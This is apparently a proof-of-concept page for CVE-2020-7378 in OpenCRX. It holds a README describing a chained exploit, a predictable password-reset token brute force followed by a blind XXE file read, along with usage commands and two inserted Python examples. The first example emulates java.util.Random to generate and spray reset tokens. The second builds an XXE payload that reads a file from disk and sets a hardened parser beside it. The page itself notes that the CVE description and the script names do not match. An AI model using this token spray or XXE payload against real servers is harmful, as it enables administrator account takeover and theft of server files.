
CVE-2020-7378 PoC: Crixp Opencrx authorization vulnerability

Associated Vulnerability
Title: Crixp Opencrx authorization vulnerability (CVE-2020-7378)
Description: Crixp Opencrx is a web application from the Swiss company Crixp for managing the sales process. It offers a Java API for Java-based clients and a Swagger-compatible RESTful API, and is used for sales, service, marketing, contact-centre and issue-management scenarios. CRIXP OpenCRX version 4.30 and versions before 5.0-20200717 contain a security vulnerability: an unverified password change. An attacker can exploit it to change the password of any user (including admin-Standard) to any value of their choosing.
Readme
## CVE-2020-7378 – OpenCRX Predictable Password Reset Token and XXE Exploit

This repository contains a combined proof-of-concept (PoC) exploit for **CVE-2020-7378**, a critical vulnerability in **OpenCRX** (versions up to and including 5.0-20200717). Note that the vulnerability entry above describes CVE-2020-7378 itself as an unverified password change (any user's password, including admin-Standard, can be set to a chosen value); the predictable reset token and the XXE chained by this PoC are distinct weaknesses reported against the same OpenCRX versions. The exploit chains two core issues in the application:

1. A **predictable password reset token** vulnerability: the token is produced with `java.util.Random` seeded from the millisecond system time, so an attacker who knows roughly when the reset was requested can enumerate every candidate token in that window.
2. A **blind XML External Entity (XXE)** vulnerability in the `RestServlet` endpoint: the XML parser resolves external entities, which lets a remote attacker read files from the server's filesystem.

The combination of these two flaws enables an unauthenticated attacker to gain administrative access and exfiltrate sensitive server-side files.
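The following is an added example, not code from this repository or from OpenCRX. It re-implements `java.util.Random`'s 48-bit linear congruential generator bit-for-bit in Python and shows the seed spray the README describes: enumerate every millisecond in a window around the attacker's own timestamp of the reset request, derive the token each seed would produce, and submit the candidates nearest the observed time first. The token format in `token_for_seed` (four `nextInt()` values rendered as hex) is an assumption standing in for OpenCRX's real derivation, `accepts` stands in for the HTTP request that submits a token, and the timestamps are constructed.

```python
"""Added example: emulate java.util.Random and spray a time-seeded reset token.

ASSUMPTION: the token format (four nextInt() values as hex) is a stand-in;
the real derivation lives in the OpenCRX source and is not reproduced here.
"""

MASK48 = (1 << 48) - 1
MULTIPLIER = 0x5DEECE66D
INCREMENT = 0xB


class JavaRandom:
    """Bit-exact re-implementation of java.util.Random (48-bit LCG)."""

    def __init__(self, seed: int) -> None:
        # Java scrambles the caller's seed with the multiplier before use.
        self.seed = (seed ^ MULTIPLIER) & MASK48

    def _next(self, bits: int) -> int:
        self.seed = (self.seed * MULTIPLIER + INCREMENT) & MASK48
        r = self.seed >> (48 - bits)
        # Java returns a signed 32-bit int; mirror the wrap-around.
        return r - (1 << 32) if r >= (1 << 31) else r

    def next_int(self) -> int:
        return self._next(32)


def token_for_seed(seed_ms: int) -> str:
    """ASSUMED token derivation: 32 hex chars from four nextInt() calls."""
    rng = JavaRandom(seed_ms)
    return "".join(f"{rng.next_int() & 0xFFFFFFFF:08x}" for _ in range(4))


def candidate_seeds(observed_ms: int, window_ms: int):
    """Yield millisecond seeds nearest the observed time first: the server's
    clock read is normally within a few ms of the attacker's own timestamp."""
    yield observed_ms
    for delta in range(1, window_ms + 1):
        yield observed_ms - delta
        yield observed_ms + delta


def spray_reset_token(observed_ms: int, window_ms: int, accepts):
    """Submit each candidate token via `accepts` (stand-in for the HTTP reset
    request). Returns (seed, attempts) on success, None if the window misses."""
    for attempts, seed in enumerate(candidate_seeds(observed_ms, window_ms), start=1):
        if accepts(token_for_seed(seed)):
            return seed, attempts
    return None


def demo():
    # Constructed scenario: the server seeded its token 40 ms before the
    # attacker's local timestamp for the reset request.
    server_ms = 1_595_000_000_000          # constructed, mid-July 2020
    attacker_ms = server_ms + 40
    server_token = token_for_seed(server_ms)
    # A real run would POST each token to the reset endpoint; here the
    # "server" simply compares against the token it generated.
    return spray_reset_token(attacker_ms, 2_000, lambda t: t == server_token)


if __name__ == "__main__":
    seed, attempts = demo()
    print(f"seed recovered: {seed} after {attempts} candidate tokens")
```

`JavaRandom(0).next_int()` returns -1155484576, the same value `new Random(0).nextInt()` gives in Java, which is a quick check that the emulation is bit-exact before trusting any token it derives. Searching outward from the observed time matters in practice: a ±2 s window is at most 4001 requests, but when the server's clock read is 40 ms off the attacker's timestamp the accepted token is the 80th candidate.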

---

### Vulnerability Details

* **CVE ID**: [CVE-2020-7378](https://nvd.nist.gov/vuln/detail/CVE-2020-7378)
* **Affected Product**: OpenCRX ≤ 5.0-20200717
* **Attack Surface**: Publicly exposed management and REST interfaces
* **Root Causes**:

  * Insecure pseudo-random token generation during password resets
  * Unsafe XML parsing in REST API endpoints
* **Impact**:

  * Unauthorized password resets for arbitrary users (including admin)
  * Arbitrary file read via XXE injection
* **CVSS**: 9.1 (Critical)

---

### Included Components

* `opencrx-exploit.py`: Full-chain exploit script that performs both token prediction and the XXE file read (the file snapshot below lists this script as `opencrx-reset-spray.py`).
* `OpenCRXToken.java`: Java class that emulates the server's `java.util.Random` token generation and enumerates the seed range around the time the reset request was sent.

### Usage

1. Compile the token generator:

   ```bash
   javac OpenCRXToken.java
   ```

2. Run the exploit:

   ```bash
   python3 opencrx-exploit.py <target_user_id>
   ```

This will:

* Generate a candidate reset token for every millisecond in the timing window and submit them until the server accepts one.
* Reset the target user's password.
* Trigger an XXE payload via the REST API to read a sensitive file from the server.
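The following is an added example, not code from this repository or from OpenCRX. It reproduces the XXE class behind the `RestServlet` finding with the Python standard library's `xml.sax` parser so that it runs offline: `parse_vulnerable` resolves external general entities the way a mis-configured Java parser does and therefore returns the contents of whatever file the DOCTYPE points at, while `parse_hardened` refuses any DOCTYPE/ENTITY declaration and keeps external entity resolution off, mirroring the usual Java fix (`disallow-doctype-decl` and `external-general-entities=false`) rather than OpenCRX's actual patch. The secret file and the payload are constructed for the demo.

```python
"""Added example: XXE file disclosure through an entity-resolving parser,
beside a hardened parser that refuses DTDs. Not OpenCRX's code or patch."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, including text pulled in via entities."""

    def __init__(self) -> None:
        super().__init__()
        self.parts = []

    def characters(self, content: str) -> None:
        self.parts.append(content)

    @property
    def text(self) -> str:
        return "".join(self.parts)


def parse_vulnerable(xml_bytes: bytes) -> str:
    """Resolves external general entities: <!ENTITY x SYSTEM "path"> reads path."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)   # the unsafe setting
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


class RefuseExternal(EntityResolver):
    """Fails closed if anything still asks to resolve an external entity."""

    def resolveEntity(self, publicId, systemId):
        raise ValueError(f"external entity refused: {systemId}")


def parse_hardened(xml_bytes: bytes) -> str:
    """Rejects DTDs outright (as disallow-doctype-decl does in Java) and keeps
    external general entities disabled, so no file or URL is ever fetched."""
    if b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes:
        raise ValueError("DOCTYPE/ENTITY declarations are not accepted")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setEntityResolver(RefuseExternal())
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def xxe_payload(path: str) -> bytes:
    """Constructed payload: an external entity pointing at a file on disk."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{path}">]>'
        "<r>&xxe;</r>"
    ).encode()


def demo():
    """Returns (what the vulnerable parser leaked, whether the hardened one blocked it)."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as fh:
        fh.write("secret-from-disk")   # constructed stand-in for a sensitive file
        path = fh.name
    try:
        leaked = parse_vulnerable(xxe_payload(path))
        try:
            parse_hardened(xxe_payload(path))
            blocked = False
        except ValueError:
            blocked = True
    finally:
        os.unlink(path)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print(f"vulnerable parser returned: {leaked!r}; hardened parser blocked: {blocked}")
```

The README's `RestServlet` case is blind, meaning the parsed content is not echoed in the response, so a real exploit carries the file contents out over a secondary channel (for example an external DTD that embeds them in a URL the server is made to fetch); the reflected variant here is enough to show the parser behaviour and why refusing the DOCTYPE, rather than only disabling one feature, is the fix to reach for.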

File Snapshot

```
[4.0K] /data/pocs/c7648a99e1ce8c2e6afdd85ccf655173b583678c
├── [2.5K] opencrx-reset-spray.py
├── [ 732] OpenCRXToken.java
└── [1.9K] README.md

0 directories, 3 files
```